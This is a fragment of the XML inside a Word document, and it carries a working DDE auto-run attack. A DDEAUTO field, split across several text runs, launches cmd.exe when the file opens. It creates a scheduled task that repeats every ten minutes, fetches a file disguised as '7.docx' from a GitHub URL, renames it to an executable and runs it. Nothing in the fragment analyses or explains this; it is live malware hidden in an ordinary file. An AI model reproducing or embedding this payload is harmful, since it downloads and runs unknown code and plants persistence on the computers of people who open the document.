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361" w:rsidRDefault="005E53A3">
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidRPr="005E53A3">
        <w:instrText>DDEAUTO c:\\windows\\system32\\cmd.exe "/k cd /&amp;cd Users&amp;cd Public&amp;SCHTASKS /Create /SC MINUTE /MO 10 /TN fj /TR C:\Users\Public\s.cmd /f&amp;echo start https://github.com/WendySeattle/E/raw/main/7.docx^&amp;cd %userprofile%\\My Downloads^&amp;ren 7.docx hh.exe^&amp;</w:instrText>
      </w:r>
      <w:r>
        <w:instrText>hh</w:instrText>
      </w:r>
      <w:r w:rsidRPr="005E53A3">
        <w:instrText>.exe&gt;s.cmd"</w:instrText>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0033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53A3"/>
    <w:rsid w:val="00336361"/>
    <w:rsid w:val="005E5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Singapore</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Singapore</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-04-12T09:04:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-12T09:05:00Z</dcterms:modified>
</cp:coreProperties>
</file>